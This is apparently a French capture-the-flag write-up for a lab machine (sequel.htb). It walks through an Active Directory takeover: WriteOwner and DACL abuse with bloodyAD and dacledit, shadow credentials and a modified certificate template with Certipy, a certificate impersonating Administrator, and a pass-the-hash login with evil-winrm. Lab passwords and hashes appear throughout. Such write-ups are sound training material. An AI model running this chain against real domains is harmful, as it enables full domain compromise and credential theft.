WriteOwner (whoami /priv) - Windows Privilege Escalation

Observation : L'utilisateur Ryan possède l'autorisation WriteOwner sur le compte CA_SVC, qui est également l'émetteur du certificat. Cela signifie que nous pouvons modifier le propriétaire du compte CA_SVC pour y associer Ryan.

Prise de contrôle de CA_SVC avec BloodyAD

Changement du propriétaire du compte

bloodyAD --host '10.10.11.51' -d 'sequel.htb' -u 'ryan' -p 'WqSZAF6CysDQbGb3' set owner 'ca_svc' 'ryan'

La commande utilise BloodyAD pour modifier le propriétaire de CA_SVC et le définir sur Ryan. En tant que propriétaire, Ryan peut maintenant modifier les autorisations associées au compte.

Modification des permissions avec Dacledit

Accorder des permissions complètes à Ryan

dacledit.py -action write -rights FullControl -principal ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3

Cette commande modifie la DACL (Discretionary Access Control List) du compte CA_SVC pour accorder un contrôle total à Ryan. Cela permet à Ryan de réinitialiser le mot de passe ou de manipuler les clés d'authentification.

Extraction des informations d'identification fantômes (Shadow Credentials)

Générer et récupérer l'empreinte NT hash

certipy shadow auto -u '[email protected]' -p "WqSZAF6CysDQbGb3" -account 'ca_svc' -dc-ip '10.10.11.51' -target dc01.sequel.htb -ns 10.10.11.51

NT hash pour CA_SVC : 3b181b914e7a9d5508ea1e20bc2b7fce

La commande Certipy génère une clé d'identification pour CA_SVC, activant l'authentification basée sur un certificat. Un fichier .ccache est également généré, ce qui facilite des attaques basées sur Kerberos.

Modification du modèle de certificat

Ajuster le modèle DunderMifflinAuthentication

KRB5CCNAME=$PWD/ca_svc.ccache certipy template  -k -template DunderMifflinAuthentication  -target dc01.sequel.htb -dc-ip 10.10.11.51

Cette commande modifie le modèle de certificat DunderMifflinAuthentication pour qu’il permette l’émission de certificats avec des privilèges élevés.

Émission d’un certificat pour l’administrateur

Demande d’un certificat pour impersonation

certipy req -u ca_svc -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca sequel-DC01-CA -target dc01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn [email protected] -ns 10.10.11.51 -dns 10.10.11.51

Cette commande demande un certificat au nom de l’Administrateur ([email protected]), permettant d’usurper l’identité de ce compte.

Authentification en tant qu’Administrateur

Utilisation du certificat pour s’authentifier

certipy auth -pfx administrator_10.pfx -dc-ip 10.10.11.51

NTLMv2 Hash : 7a8d4e04986afa8ed4060f75e5a0b3ff

 evil-winrm -i 10.10.11.51 -u administrator -H "7a8d4e04986afa8ed4060f75e5a0b3ff"

Mis à jour il y a 1 an

hashtagPrise de contrôle de CA_SVC avec BloodyAD

hashtagChangement du propriétaire du compte

hashtagModification des permissions avec Dacledit

hashtagAccorder des permissions complètes à Ryan

hashtagExtraction des informations d'identification fantômes (Shadow Credentials)

hashtagGénérer et récupérer l'empreinte NT hash

hashtagModification du modèle de certificat

hashtagAjuster le modèle DunderMifflinAuthentication

hashtagÉmission d’un certificat pour l’administrateur

hashtagDemande d’un certificat pour impersonation

hashtagAuthentification en tant qu’Administrateur

hashtagUtilisation du certificat pour s’authentifier